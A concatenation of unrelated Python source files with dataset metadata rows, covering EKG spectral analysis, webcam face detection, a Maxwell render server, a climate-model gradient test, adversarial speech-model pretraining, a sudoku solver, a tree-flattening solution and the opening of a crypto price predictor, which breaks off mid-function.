ax.plot(psd['freqs'], pwr, color='black', zorder=10)
colors = [None, 'yellow', 'darkorange', 'tomato']
zdict = {0:0.6, 1:0.6, 2:0.4, 3:0.6}
for (zord, alpha), (key, value), color in zip(zdict.items(), self.psd_fband_vals.items(), colors):
if value['idx'] is not None:
# get intercepts & plot vertical lines for bands
xrange = [float(x) for x in self.freq_stats[key]['freq_range'][1:-1].split(",")]
# fill spectra by band
ax.fill_between(psd['freqs'], pwr, where = [xrange[0] <= x for x in psd['freqs']],
facecolor=color, alpha=alpha, zorder=zord)
ax.set_xlim(0, 0.4)
ax.margins(y=0)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
plt.xlabel('Frequency (Hz)')
plt.ylabel(ylabel)
plt.suptitle(title)
if save == True:
if savedir is None:
print('ERROR: File not saved. Please specify savedir argument.')
else:
savename = os.path.join(savedir, self.metadata['file_info']['fname'].split('.')[0]) + '_psd.png'
fig.savefig(savename, dpi=300)
return fig
def generate_PS(self, denoised = True, confidence = 'bootstrapping'):
"""
Generate power spectrum with desired confidence levels.
Parameters
----------
denoised : bool default True
Denoise the mulitaper estimate of the power spectral density.
confidence : str {'bootstrapping', 'chi sq'}
Method with which to determine the confidence intervals.
See Also
---------
EKG.data_pre_processing : Load data to the workspace and perform pre-processing.
EKG.denoised_mt_spectral_estimation : Peform expectation maximization to estimate the denoised Eigen coefficients and denoised Multitaper spectral estimates.
EKG.direct_mt_spectral_estimation : Produce the classical multitaper estimate of the Power Spectral Density.
EKG.plot_estimates : Create figure containing the final PSD estimates with the confidence levels.
"""
# Main task 1. Load data into the workspace and specify the parameters - pre processing
# Specify the desired sampling frequency of the time series in Hz
fs = 4
# Extract the interpolated and zero centered NN time series
NN_intervals_interpolated, K = self.data_pre_processing(fs)
K = NN_intervals_interpolated.shape[0]
# Set the parameters required for Spectral analysis - multi tapering
N = 512 # Number of frequency bins considered in the frequency interval [0,fs/2). This determines the frequency spacing.
NW = 2 # time half-bandwidth product of Multitapering
no_of_tapers = 3 # the number of tapers considered for Multitapering
# Set the parameters required for Confidence Intervals
CI = 0.95 # Specify the Required Confidence levels
bootstrapping_repeats = 5000 # Specify the number of bootstrap samples
scaling_fac = (1/fs)*(K / N) # Final scaling factor of the PSD estimates
freq_vector = np.arange(0.0, 0.5*fs, 0.5*fs/N)
multi_tapering_spectral_resolution = NW*fs/K
if denoised==True:
denoised_MT_est, denoised_w_est_tapers = self.denoised_mt_spectral_estimation(NN_intervals_interpolated, N, NW, no_of_tapers,K, fs)
# Multiply by the required scaling factors to get the final spectral estimates
denoised_MT_est_final = scaling_fac*denoised_MT_est;
if confidence == "bootstrapping":
denoised_MT_est_Lower_confidence_bootstrap, denoised_MT_est_Upper_confidence_bootstrap = self.confidence_intervals_bootstrapping(denoised_MT_est, denoised_w_est_tapers, CI, bootstrapping_repeats, fs, K, N)
fig = self.plot_estimates(denoised_MT_est_final, denoised_MT_est_Lower_confidence_bootstrap, denoised_MT_est_Upper_confidence_bootstrap, fs)
plt.title('Denoised Multitaper Spectral Estimate: with %d%% Confidence Intervals - Bootstrapping'% (CI*100),fontdict = {'fontsize' : 16})
if confidence == "chi sq":
denoised_MT_est_Lower_confidence_Chi_squared, denoised_MT_est_Upper_confidence_Chi_squared = self.confidence_intervals_chi_squared(denoised_MT_est_final, CI, no_of_tapers, N)
fig = self.plot_estimates(denoised_MT_est_final, denoised_MT_est_Lower_confidence_Chi_squared, denoised_MT_est_Upper_confidence_Chi_squared, fs)
plt.title('Denoised Multitaper Spectral Estimate: with %d%% Confidence Intervals - Chi - squared test'% (CI*100),fontdict = {'fontsize' : 16})
if denoised==False:
direct_MT_est, direct_w_est_tapers = self.direct_mt_spectral_estimation(NN_intervals_interpolated, N, NW, no_of_tapers, fs)
# Multiply by the required scaling factors to get the final spectral estimates
direct_MT_est_final = scaling_fac*direct_MT_est
if confidence == 'bootstrapping':
direct_MT_est_Lower_confidence_bootstrap, direct_MT_est_Upper_confidence_bootstrap = self.confidence_intervals_bootstrapping(direct_MT_est, direct_w_est_tapers, CI, bootstrapping_repeats, fs, K, N)
fig = self.plot_estimates(direct_MT_est_final, direct_MT_est_Lower_confidence_bootstrap, direct_MT_est_Upper_confidence_bootstrap, fs)
plt.title('Direct Multitaper Spectral Estimate: with %d%% Confidence Intervals - Bootstrapping'% (CI*100),fontdict = {'fontsize' : 16})
if confidence == 'chi sq':
direct_MT_est_Lower_confidence_Chi_squared, direct_MT_est_Upper_confidence_Chi_squared = self.confidence_intervals_chi_squared(direct_MT_est_final, CI, no_of_tapers, N)
fig = self.plot_estimates(direct_MT_est_final, direct_MT_est_Lower_confidence_Chi_squared, direct_MT_est_Upper_confidence_Chi_squared, fs)
plt.title('Direct Multitaper Spectral Estimate: with %d%% Confidence Intervals - Chi - squared test'% (CI*100),fontdict = {'fontsize' : 16})
plt.xlabel("frequency ($Hz$)")
plt.show()
# plt.xlim([np.min(freq_vector), np.max(freq_vector)])
| CardioPy/CardioPy | cardiopy/ekg.py | ekg.py | py | 87,636 | python | en | code | 7 | github-code | 36 |
41907884718 | import time
import cv2
import mediapipe as mp
mp_face_detection = mp.solutions.face_detection
import os
os.environ['OPENCV_FFMPEG_CAPTURE_OPTIONS'] = 'rtsp_transport;udp'
class face_detection:
def __init__(self):
self.URL = "rtsp://192.168.0.22:8554/"
self.cap = cv2.VideoCapture(0, cv2.CAP_DSHOW)
self.image = None
self.device = 0
self.width = 960
self.height = 540
def detect_face(self):
cap = self.cap
cap.set(cv2.CAP_PROP_FRAME_WIDTH, self.width)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, self.height)
while 1:
ret, frame = cap.read()
self.image = frame
with mp_face_detection.FaceDetection(model_selection=1, min_detection_confidence=1) as face_detection:
results = face_detection.process(cv2.cvtColor(self.image, cv2.COLOR_BGR2RGB))
if not results.detections: # face detect X -> return False
pass
else: # detected face -> return True
cv2.imwrite("face.jpg", frame)
cap.release()
return True
if __name__ == '__main__':
fd = face_detection()
if fd.detect_face():
os.system("F3.bat")
time.sleep(2);
print("2초간 사람 인식 완료")
os.system('python ./age_prediction_model/age_pred.py')
| CSID-DGU/2022-2-SCS4031-EZ_SW | FaceDetection.py | FaceDetection.py | py | 1,175 | python | en | code | 0 | github-code | 36 |
34118610496 | import os
from flask import Flask
import ghhops_server as hs
import rhino3dm
import pymaxwell5 as pym
app = Flask(__name__) #flask
hops = hs.Hops(app) #flask
#hops = hs.Hops() #http
@hops.component(
"/maxwell",
name="Maxwell",
description="render",
icon="C://Users//archi//Dropbox//course//maxwell.png",
inputs=[
hs.HopsBoolean("run","run","render scene"),
hs.HopsString("width","width",""),
hs.HopsString("height","height",""),
hs.HopsString("time","time",""),
hs.HopsString("sl","sl",""),
hs.HopsString("img","img",""),
hs.HopsString("mxi","mxi",""),
hs.HopsString("mxs_file","inPath",""),
hs.HopsString("output_folder","outFolder",""),
],
outputs=[
hs.HopsString('image','image','')
]
)
def maxwell(run,width,height,time,sl,img,mxi,inPath, outFolder):
if run:
return run_maxwell_render(width,height,time,sl,img,mxi,inPath, outFolder)
else:
return outFolder + img
def run_maxwell_render(width,height,time,sl,img,mxi,inPath, outFolder):
if not os.path.exists(outFolder):
os.mkdir(outFolder)
parameters = []
parameters.append('-mxs:' + inPath)
parameters.append('-o:' + outFolder + img)
parameters.append('-mxi:' + outFolder + mxi)
parameters.append('-res:' + width + 'x' + height)
parameters.append('-time:' + time)
parameters.append('-sl:' + sl)
# parameters.append('-nowait')
parameters.append('-nomxi:off')
parameters.append('-noimage:off')
pym.runMaxwell(parameters)
return outFolder+img
if __name__ == "__main__":
app.run() #flask
#hops.start(debug=True) #http
| seghier/maxwell | venv/maxwell.py | maxwell.py | py | 1,679 | python | en | code | 0 | github-code | 36 |
21334762187 | import unittest
import numpy as np
import pandas as pd
from os.path import join, dirname
from pandas import DataFrame, read_csv
from sostrades_core.execution_engine.execution_engine import ExecutionEngine
from sostrades_core.tests.core.abstract_jacobian_unit_test import AbstractJacobianUnittest
class GHGEmissionsJacobianDiscTest(AbstractJacobianUnittest):
#AbstractJacobianUnittest.DUMP_JACOBIAN = True
def setUp(self):
self.name = 'Test'
self.ee = ExecutionEngine(self.name)
def analytic_grad_entry(self):
return [
self.test_carbon_emissions_analytic_grad
]
def test_carbon_emissions_analytic_grad(self):
self.model_name = 'agriculture_emissions'
ns_dict = {'ns_witness': f'{self.name}',
'ns_public': f'{self.name}',
'ns_agriculture': f'{self.name}',
'ns_ref': f'{self.name}',
}
self.ee.ns_manager.add_ns_def(ns_dict)
mod_path = 'climateeconomics.sos_wrapping.sos_wrapping_emissions.agriculture_emissions.agriculture_emissions_discipline.AgricultureEmissionsDiscipline'
builder = self.ee.factory.get_builder_from_module(
self.model_name, mod_path)
self.ee.factory.set_builders_to_coupling_builder(builder)
self.ee.configure()
self.ee.display_treeview_nodes()
year_start = 2020
year_end = 2100
years = np.arange(year_start, year_end + 1)
CO2_land_emissions = pd.DataFrame({'years': years,
'emitted_CO2_evol_cumulative': np.linspace(0., 0.7, len(years))})
N2O_land_emissions = pd.DataFrame({'years': years,
'emitted_N2O_evol_cumulative': np.linspace(0., 0.4, len(years)),
})
CH4_land_emissions = pd.DataFrame({'years': years,
'emitted_CH4_evol_cumulative': np.linspace(0., 0.5, len(years)),
})
values_dict = {f'{self.name}.year_start': year_start,
f'{self.name}.year_end': year_end,
f'{self.name}.technologies_list': ['Crop', 'Forest'],
f'{self.name}.Crop.CO2_land_emission_df': CO2_land_emissions,
f'{self.name}.Forest.CO2_land_emission_df': CO2_land_emissions,
f'{self.name}.Crop.CH4_land_emission_df': CH4_land_emissions,
f'{self.name}.Crop.N2O_land_emission_df': N2O_land_emissions,
}
self.ee.load_study_from_input_dict(values_dict)
self.ee.execute()
disc_techno = self.ee.root_process.proxy_disciplines[0].mdo_discipline_wrapp.mdo_discipline
self.check_jacobian(location=dirname(__file__), filename=f'jacobian_agriculture_ghg_emission_discipline.pkl',
discipline=disc_techno, step=1e-15, derr_approx='complex_step', local_data = disc_techno.local_data,
inputs=[f'{self.name}.Crop.CO2_land_emission_df',
f'{self.name}.Forest.CO2_land_emission_df',
f'{self.name}.Crop.CH4_land_emission_df',
f'{self.name}.Crop.N2O_land_emission_df'],
outputs=[f'{self.name}.CO2_land_emissions',
f'{self.name}.CH4_land_emissions',
f'{self.name}.N2O_land_emissions'
])
| os-climate/witness-core | climateeconomics/tests/l1_test_gradient_agriculture_ghgemissions_discipline.py | l1_test_gradient_agriculture_ghgemissions_discipline.py | py | 3,649 | python | en | code | 7 | github-code | 36 |
2876716401 | from argparse import ArgumentParser
from config_parser import get_config
import os
import yaml
import matplotlib.pyplot as plt
import time
import torch
from torch import nn, optim
import wandb
from typing import Callable, Tuple
from utils.loss import LabelSmoothingLoss
from utils.opt import get_optimizer, get_adversarial_optimizer
from utils.scheduler import WarmUpLR, get_scheduler
from utils.trainer import train, evaluate, evaluate_sliding_window, train_single_batch
from utils.dataset import get_loader, get_noisy_loader
from utils.misc import seed_everything, count_params, get_model, calc_step, log
#from data2vec.data2vec_utils.trainer import train_single_batch
from utils.misc import log, save_model
from torch.utils.data import DataLoader
from data2vec.masking import AudioMaskingGenerator
from models.Data2Vec import Data2Vec
from tqdm import tqdm
import copy
from collections import OrderedDict
import data2vec.data2vec_utils.trainer
import utils.trainer
def adv_pretrain(config_kwt, config_d2v, k, alpha):
"""Adverserial pretraining with noisy data.
Args:
config_kwt (dict): Keyword transformer config for noise type prediction
config_d2v (dict): Data2vec config for masked prediction (regression)
k (int): Lower K common layers that the two models share.
"""
######################################
# save hyperparameters for current run
######################################
config_kwt["exp"]["save_dir"] = os.path.join(config_kwt["exp"]["exp_dir"], config_kwt["exp"]["exp_name"])
os.makedirs(config_kwt["exp"]["save_dir"], exist_ok=True)
config_d2v["exp"]["save_dir"] = os.path.join(config_d2v["exp"]["exp_name"])
os.makedirs(config_d2v["exp"]["save_dir"], exist_ok=True)
config_str = yaml.dump(config_kwt)
print("Using settings:\n", config_str)
with open(os.path.join(config_kwt["exp"]["save_dir"], "settings.txt"), "w+") as f:
f.write(config_str)
######################################
# data loaders
######################################
# training
# adversarial
print("Loading adversarial training dataset...")
with open(config_kwt["train_list_file"], "r") as f:
train_lista = f.read().rstrip().split("\n")
trainloadera = get_noisy_loader(train_lista, config_kwt, train=True)
# friendly
print("Loading friendly training dataset...")
with open(config_d2v["train_list_file"], "r") as f:
train_listf = f.read().rstrip().split("\n")
trainloaderf = get_loader(train_listf, config_d2v, train=True)
# validation
# adversarial
print("Loading adversarial validation dataset...")
with open(config_kwt["val_list_file"], "r") as f:
val_lista = f.read().rstrip().split("\n")
valloadera = get_noisy_loader(val_lista, config_kwt, train=False)
#friendly
print("Loading friendly validation dataset...")
with open(config_d2v["val_list_file"], "r") as f:
val_listf = f.read().rstrip().split("\n")
valloaderf = get_loader(val_listf, config_d2v, train=False)
mask_generator = AudioMaskingGenerator(mask_prob=config_d2v["hparams"]["model"]["mask_prob"],
mask_length=config_d2v["hparams"]["model"]["mask_length"],
attention_mask=None,
min_masks=config_d2v["hparams"]["model"]["min_masks"])
######################################
# models
######################################
# KWT model
model_kwt = get_model(config_kwt["hparams"]["model"])
model_kwt = model_kwt.to(config_kwt["hparams"]["device"])
model_kwt_copy = copy.deepcopy(model_kwt)
# data2vec model
model_d2v = Data2Vec(encoder=model_kwt_copy,
modality=config_d2v["modality"],
model_embed_dim=config_d2v["hparams"]["model"]["dim"],
ema_decay=config_d2v["hparams"]["model"]["ema_decay"],
ema_end_decay=config_d2v["hparams"]["model"]["ema_end_decay"],
ema_anneal_end_step=config_d2v["hparams"]["model"]["ema_anneal_end_step"],
average_top_k_layers=config_d2v["hparams"]["model"]["average_top_k_layers"],
normalize_targets=config_d2v["hparams"]["model"]["normalize_targets"])
model_d2v= model_d2v.to(config_d2v["hparams"]["device"])
criterion_kwt = nn.CrossEntropyLoss()
criterion_d2v = nn.MSELoss(reduction="none")
parameters_kwt = model_kwt.parameters()
parameters_d2v = model_d2v.parameters()
# optimizer for KWT
optimizer_kwt = get_adversarial_optimizer(model_kwt, config_kwt["hparams"]["optimizer"], k, alpha)
# optimizer for data2vec
optimizer_d2v = optim.Adam(parameters_d2v, lr=config_d2v["hparams"]["optimizer"]["opt_kwargs"]["lr"],
betas=config_d2v["hparams"]["optimizer"]["opt_kwargs"]["betas"],
eps=config_d2v["hparams"]["optimizer"]["opt_kwargs"]["eps"],
weight_decay=config_d2v["hparams"]["optimizer"]["opt_kwargs"]["weight_decay"])
#for group in optimizer_kwt.param_groups:
# print(group['lr'])
#return
# Learning rate scheduler for data2vec
epochs = config_d2v["hparams"]["n_epochs"]
steps_per_epoch = len(trainloaderf)
lr_scheduler = optim.lr_scheduler.OneCycleLR(
optimizer_d2v,
max_lr=config_d2v["hparams"]["optimizer"]["opt_kwargs"]["lr"],
epochs=epochs,
steps_per_epoch=steps_per_epoch,
anneal_strategy="cos")
schedulers_d2v = {"scheduler": lr_scheduler,
"warmup": 0}
# Learning rate scheduler for KWT
schedulers_kwt = {
"warmup": None,
"scheduler": None
}
# Setting up the learning rate scheduler for data2vec and KWT
if config_d2v["hparams"]["scheduler"]["n_warmup"]:
schedulers_d2v["warmup"] = WarmUpLR(optimizer_kwt, total_iters=len(trainloaderf) * config_d2v["hparams"]["scheduler"]["n_warmup"])
if config_d2v["hparams"]["scheduler"]["scheduler_type"] is not None:
total_iters = len(trainloaderf) * max(1, (config_d2v["hparams"]["scheduler"]["max_epochs"] - config_d2v["hparams"]["scheduler"]["n_warmup"]))
schedulers_d2v["scheduler"] = get_scheduler(optimizer_kwt, config_d2v["hparams"]["scheduler"]["scheduler_type"], total_iters)
if config_kwt["hparams"]["scheduler"]["n_warmup"]:
schedulers_kwt["warmup"] = WarmUpLR(optimizer_kwt, total_iters=len(trainloadera) * config_kwt["hparams"]["scheduler"]["n_warmup"])
if config_kwt["hparams"]["scheduler"]["scheduler_type"] is not None:
total_iters = len(trainloadera) * max(1, (config_kwt["hparams"]["scheduler"]["max_epochs"] - config_kwt["hparams"]["scheduler"]["n_warmup"]))
schedulers_kwt["scheduler"] = get_scheduler(optimizer_kwt, config_kwt["hparams"]["scheduler"]["scheduler_type"], total_iters)
# Saving directory for the data2vec model
config_d2v["exp"]["save_dir"] = os.path.join(config_d2v["exp"]["exp_dir"], config_d2v["exp"]["exp_name"])
os.makedirs(config_d2v["exp"]["save_dir"], exist_ok=True)
######################################
# train models
######################################
step = 0
best_acc = 0.0
device = config_d2v["hparams"]["device"]
log_file = os.path.join(config_d2v["exp"]["exp_dir"], "training_log.txt")
best_avg_loss = 0.0
n_batches = len(trainloaderf)
for epoch in range(config_d2v["hparams"]["n_epochs"]):
t0 = time.time()
running_loss_d2v = 0.0
running_target_var_d2v = 0.0
running_prediction_var_d2v = 0.0
running_loss_kwt = 0.0
correct_kwt = 0
for (dataf, targetsf), (dataa, targetsa) in zip(trainloaderf, trainloadera):
batch_size = dataf.size(dim=0)
audio_length = dataf.size(dim=-1)
######################################
# data2vec step - friendly step
######################################
# masking
mask = mask_generator(shape=(batch_size, audio_length)).to(device)
mask = torch.cat([torch.zeros(batch_size, 1, device=mask.device), mask], dim=1).bool()
# loading first K transformer layers of KWT
kwt_partial_state_dict = load_partial_state_dict(model_kwt.state_dict(), k)
model_d2v.load_state_dict(kwt_partial_state_dict, strict=False)
# train single batch
loss_d2v, target_var_d2v, prediction_var_d2v = data2vec.data2vec_utils.trainer.train_single_batch(model_d2v, dataf, mask, optimizer_d2v, criterion_d2v, device)
model_d2v.ema_step()
running_loss_d2v += loss_d2v
running_target_var_d2v += target_var_d2v
running_prediction_var_d2v += prediction_var_d2v
# learning rate scheduler
if schedulers_d2v["warmup"] is not None and epoch < config_d2v["hparams"]["scheduler"]["n_warmup"]:
schedulers_d2v["warmup"].step()
elif schedulers_d2v["scheduler"] is not None:
schedulers_d2v["scheduler"].step()
# logging data2vec step
if not step % config_d2v["exp"]["log_freq"]:
log_dict = {"epoch": epoch, "loss": loss_d2v, "lr": optimizer_d2v.param_groups[0]["lr"],
"target_var": target_var_d2v, "prediction_var": prediction_var_d2v}
log(log_dict, step, config_d2v)
######################################
# kwt step - adversarial step
######################################
# loading first K layers of data2vec encoder
d2v_partial_state_dict = load_partial_state_dict(model_d2v.state_dict(), k)
model_kwt.load_state_dict(d2v_partial_state_dict, strict=False)
# train single batch
loss_kwt, corr_kwt = utils.trainer.train_single_batch(model_kwt, dataa, targetsa, optimizer_kwt, criterion_kwt, device)
running_loss_kwt += loss_kwt
correct_kwt += corr_kwt
# logging KWT step
if schedulers_kwt["warmup"] is not None and epoch < config_kwt["hparams"]["scheduler"]["n_warmup"]:
schedulers_kwt["warmup"].step()
elif schedulers_kwt["scheduler"] is not None:
schedulers_kwt["scheduler"].step()
if not step % config_kwt["exp"]["log_freq"]:
log_dict = {"epoch": epoch, "loss": loss_kwt, "lr": optimizer_kwt.param_groups[0]["lr"]}
step += 1
#################################################
# epoch complete - log, validation and save model
#################################################
# data2vec log, validation and save model
log_dict = {"epoch": epoch, "time_per_epoch": time.time() - t0,
"avg_train_target_var": running_target_var_d2v / n_batches,
"avg_train_prediction_var": running_prediction_var_d2v / n_batches,
"avg_loss_per_ep": running_loss_d2v / len(trainloaderf.dataset)}
log(log_dict, step, config_d2v)
if not epoch % config_d2v["exp"]["val_freq"]:
avg_val_loss, avg_val_target_var, avg_val_prediction_var = data2vec.data2vec_utils.trainer.evaluate(model_d2v, mask_generator, criterion_d2v,
valloaderf, device)
log_dict = {"epoch": epoch, "val_loss": avg_val_loss,
"avg_val_target_var": avg_val_target_var, "avg_val_prediction_var": avg_val_prediction_var}
#log(log_dict, step, config_d2v)
# save best validation checkpoint
if avg_val_loss < best_avg_loss or epoch == config_d2v["exp"]["val_freq"]:
best_avg_loss = avg_val_loss
save_path = os.path.join(config_d2v["exp"]["save_dir"], "best.pth")
save_model(epoch, avg_val_loss, save_path, model_d2v, optimizer_d2v, log_file)
save_path = os.path.join(config_d2v["exp"]["save_dir"], "best_encoder.pth")
save_model(epoch, avg_val_loss, save_path, model_d2v.encoder, optimizer_d2v, log_file)
# kwt log, validation and save model
log_dict = {"epoch": epoch, "time_per_epoch": time.time() - t0, "train_acc": correct_kwt/(len(trainloadera.dataset)), "avg_loss_per_ep": running_loss_kwt/len(trainloaderf)}
log(log_dict, step, config_kwt)
if not epoch % config_kwt["exp"]["val_freq"]:
val_acc, avg_val_loss = utils.trainer.evaluate(model_kwt, criterion_kwt, valloadera, device)
log_dict = {"epoch": epoch, "val_loss": avg_val_loss, "val_acc": val_acc}
log(log_dict, step, config_kwt)
# save best val ckpt
if val_acc > best_acc:
best_acc = val_acc
save_path = os.path.join(config_kwt["exp"]["exp_dir"], "best.pth")
save_model(epoch, val_acc, save_path, model_kwt, optimizer_kwt, log_file)
# training complete
# data2vec evaluation
avg_val_loss, avg_val_target_var, avg_val_prediction_var = data2vec.data2vec_utils.trainer.evaluate(model_d2v, mask_generator, criterion_d2v, valloaderf,
device)
log_dict = {"epoch": epoch, "val_loss": avg_val_loss,
"avg_val_target_var": avg_val_target_var, "avg_val_prediction_var": avg_val_prediction_var}
log(log_dict, step, config_d2v)
# data2vec save final checkpoint
save_path = os.path.join(config_d2v["exp"]["exp_dir"], "last.pth")
save_model(epoch, avg_val_loss, save_path, model_d2v, optimizer_d2v, log_file)
save_path = os.path.join(config_d2v["exp"]["exp_dir"], "last_encoder.pth")
save_model(epoch, avg_val_loss, save_path, model_d2v.encoder, optimizer_d2v, log_file)
# kwt evaluation
val_acc, avg_val_loss = evaluate(model_kwt, criterion_kwt, valloadera, device)
log_dict = {"epoch": epoch, "val_loss": avg_val_loss, "val_acc": val_acc}
log(log_dict, step, config_kwt)
# kwt save final checkpoint
save_path = os.path.join(config_kwt["exp"]["exp_dir"], "last.pth")
save_model(epoch, val_acc, save_path, model_kwt, optimizer_kwt, log_file)
def load_partial_state_dict(state_dict, K):
"""_summary_
Args:
state_dict (_type_): state_dict to load
K (_type_): first K layers to load
"""
before_transformer = True
custom_dict = OrderedDict()
for param in state_dict:
if param.split('.')[0] == "transformer":
before_transformer = False
layer_num = int(param.split('.')[2])
if layer_num >= K:
continue
custom_dict[param] = state_dict[param]
#elif before_transformer:
# custom_dict[param] = state_dict[param]
#print("###################################")
#for param in custom_dict:
# print(param, '\t\t', custom_dict[param].size())
return custom_dict
def main(args):
config_kwt = get_config(args.confk)
config_data2vec = get_config(args.confd)
seed_everything(config_kwt['hparams']['seed'])
alpha = 1
adv_pretrain(config_kwt, config_data2vec, args.k, alpha)
if __name__ == "__main__":
parser = ArgumentParser("Adversarial pretraining")
parser.add_argument("--confk", type=str, required=True, help="Path to config.yaml file for KWT.")
parser.add_argument("--confd", type=str, required=True, help="Path to config.yaml file for data2vec.")
parser.add_argument("--k", type=int, required=True, help="First K transformer layers to update")
args = parser.parse_args()
main(args) | GregTheHunInDk/Robust_KWT | adv_pretrain.py | adv_pretrain.py | py | 16,336 | python | en | code | 0 | github-code | 36 |
10724474044 | import xmltodict
import json
# Loading and parsing the xml file.
with open (r'q1.xml', "r") as xml_file:
xml_data = xml_file.read()
print(xml_data)
# Convert xml to json
json_data = json.dumps(xmltodict.parse(xml_data), indent=4)
print(json_data)
with open("output.json", "w") as json_file:
json_file.write(json_data) | JonathanDabre/ip_ut2 | UT-2/xml/q4.py | q4.py | py | 338 | python | en | code | 1 | github-code | 36 |
23680100556 | #grid = [[0 for j in range(9)] for i in range(9)]
import time
def not_complete(board):
for i in board:
if 0 in i:
return True
return False
#will return True if the inputted number is not in the row
def check_row(board, row_num, num):
if num in board[row_num]:
return False
else:
return True
#will return True if inputted number is not in the column
def check_col(board, col_num, num):
not_in_col = True
for i in range(9):
if num == board[i][col_num]:
not_in_col = False
return not_in_col
def get_box_values(board, row, col):
values = []
if row<3:
if col<3:
for i in range(3):
values.append(board[i][0:3])
elif col<6:
for i in range(3):
values.append(board[i][3:6])
elif col<9:
for i in range(3):
values.append(board[i][6:9])
elif row<6:
if col<3:
for i in range(3,6):
values.append(board[i][0:3])
elif col<6:
for i in range(3,6):
values.append(board[i][3:6])
elif col<9:
for i in range(3,6):
values.append(board[i][6:9])
elif row<9:
if col<3:
for i in range(6,9):
values.append(board[i][0:3])
elif col<6:
for i in range(6,9):
values.append(board[i][3:6])
elif col<9:
for i in range(6,9):
values.append(board[i][6:9])
return values
#returns True if inputted number not in box
def check_box(board, row, col, num):
box_values = get_box_values(board, row, col)
for row in box_values:
if num in row:
return False
return True
def find_possibilities(board,pos):
possibilities = []
for i in range(1,10):
if check_box(board, pos[0], pos[1], i) and check_row(board, pos[0], i) and check_col(board, pos[1], i):
possibilities.append(i)
return possibilities
def solver(board):
if not not_complete(board):
return board
else:
for x in range(9):
for y in range(9):
if board[x][y] == 0:
i = x
j = y
break
else:
continue
break
possibilities = find_possibilities(board, [i,j])
for choice in possibilities:
board[i][j] = choice
value = solver(board)
if value != None:
return board
board[i][j] = 0
| jfitz02/Sudoku-Solver | sudoku solver/sudokusolver.py | sudokusolver.py | py | 2,719 | python | en | code | 0 | github-code | 36 |
43914267111 | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def flatten(self, root: Optional[TreeNode]) -> None:
"""
Do not return anything, modify root in-place instead.
"""
if not root:
return None
left = self.flatten(root.left)
right = self.flatten(root.right)
root.left = None
ptr = root
if (left):
ptr.right = left
while (ptr.right):
ptr = ptr.right
ptr.right = right
return root | robinsdeepak/leetcode | 114-flatten-binary-tree-to-linked-list/114-flatten-binary-tree-to-linked-list.py | 114-flatten-binary-tree-to-linked-list.py | py | 712 | python | en | code | 0 | github-code | 36 |
2182128872 | import logging
import threading
import numpy as np
import pandas as pd
from timeit import default_timer as timer
from datetime import datetime, timedelta, timezone
from time import sleep
import time
import matplotlib.pyplot as mpl
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import ShuffleSplit
from sklearn.metrics import make_scorer, r2_score
from sklearn.model_selection import cross_val_score
from sklearn.neighbors import KNeighborsRegressor
from utils.history import Historical_Caching
import warnings
warnings.filterwarnings('ignore')
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)
logger = logging.getLogger(__name__)
# Gives a list of timestamps from the start date to the end date
#
# startDate: The start date as a string xxxx-xx-xx
# endDate: The end date as a string year-month-day
# period: 'minute', 'daily', 'weekly', or 'monthly'
# weekends: True if weekends should be included; false otherwise
# return: A numpy array of timestamps
def DateRange(startDate, endDate, period='minute', weekends=True):
# The start and end date
sd = datetime.fromtimestamp(startDate)
ed = datetime.fromtimestamp(endDate)
# print(startDate, endDate)
# Invalid start and end dates
if (sd > ed):
raise ValueError("The start date cannot be later than the end date.")
# One time period is a day
if (period == 'minute'):
prd = timedelta(minutes=1)
if (period == 'daily'):
prd = timedelta(1)
# One prediction per week
if (period == 'weekly'):
prd = timedelta(7)
# one prediction every 30 days ("month")
if (period == 'monthly'):
prd = timedelta(30)
# The final list of timestamp data
dates = []
cd = sd
while (cd <= ed):
# If weekdays are included or it's a weekday append the current ts
if (weekends or (cd.date().weekday() != 5 and cd.date().weekday() != 6)):
dates.append(cd.timestamp())
# Onto the next period
cd = cd + prd
# print(np.array(dates))
return np.array(dates)
# Given a date, returns the previous day
#
# startDate: The start date as a datetime object
# weekends: True if weekends should counted; false otherwise
def DatePrevDay(startDate):
# One day
day = timedelta(minutes=1)
cd = startDate - day
return cd
# Load data from the CSV file. Note: Some systems are unable
# to give timestamps for dates before 1970. This function may
# fail on such systems.
#
# path: The path to the file
# return: A data frame with the parsed timestamps
def ParseData(path):
# Read the csv file into a dataframe
df = None
while df is None:
try:
sleep(0.5)
df = pd.read_csv(path)
except Exception as e:
sleep(0.5)
pass
df['Timestamp'] = df['Date']
# Remove any unused columns (axis = 1 specifies fields are columns)
df = df.drop('Date', axis=1)
# df = df.iloc[::-1] # CHECK THIS
return df
# Given dataframe from ParseData
# plot it to the screen
#
# df: Dataframe returned from
# p: The position of the predicted data points
def PlotData(df, p=None):
if (p is None):
p = np.array([])
# Timestamp data
ts = df.Timestamp.values
# Number of x tick marks
nTicks = 10
# Left most x value
s = np.min(ts)
# Right most x value
e = np.max(ts)
# Total range of x values
r = e - s
# Add some buffer on both sides
s -= r / 5
e += r / 5
# These will be the tick locations on the x axis
tickMarks = np.arange(s, e, (e - s) / nTicks)
# Convert timestamps to strings
strTs = [datetime.fromtimestamp(i).strftime('%Y-%m-%d %H:%M:%S') for i in tickMarks]
mpl.figure()
# Plots of the high and low values for the day
mpl.plot(ts, df.High.values, color='#727272', linewidth=1.618, label='Actual')
# Predicted data was also provided
if (len(p) > 0):
mpl.plot(ts[p], df.High.values[p], color='#7294AA', linewidth=1.618, label='Predicted')
# Set the tick marks
mpl.xticks(tickMarks, strTs, rotation='vertical')
# Set y-axis label
mpl.ylabel('Crypto Price (USD)')
# Add the label in the upper left
mpl.legend(loc='upper left')
mpl.show()
# A class that predicts stock prices based on historical stock data
class Predictor:
# Constructor
# nPrevDays: The number of past days to include
# in a sample.
# rmodel: The regressor model to use (sklearn)
# nPastDays: The number of past days in each feature
# scaler: The scaler object used to scale the data (sklearn)
def __init__(self, rmodel, nPastDays, scaler=StandardScaler()):
self.npd = nPastDays
self.R = rmodel
self.S = scaler
self.D = None
self.D_orig = None
self.DTS = None
self.A = None
self.y = None
self.targCols = None
# Extracts features from stock market data
#
# D: A dataframe from ParseData
# ret: The data matrix of samples
def _ExtractFeat(self, D):
# One row per day of stock data
m = D.shape[0]
# Open, High, Low, and Close for past n days + timestamp and volume
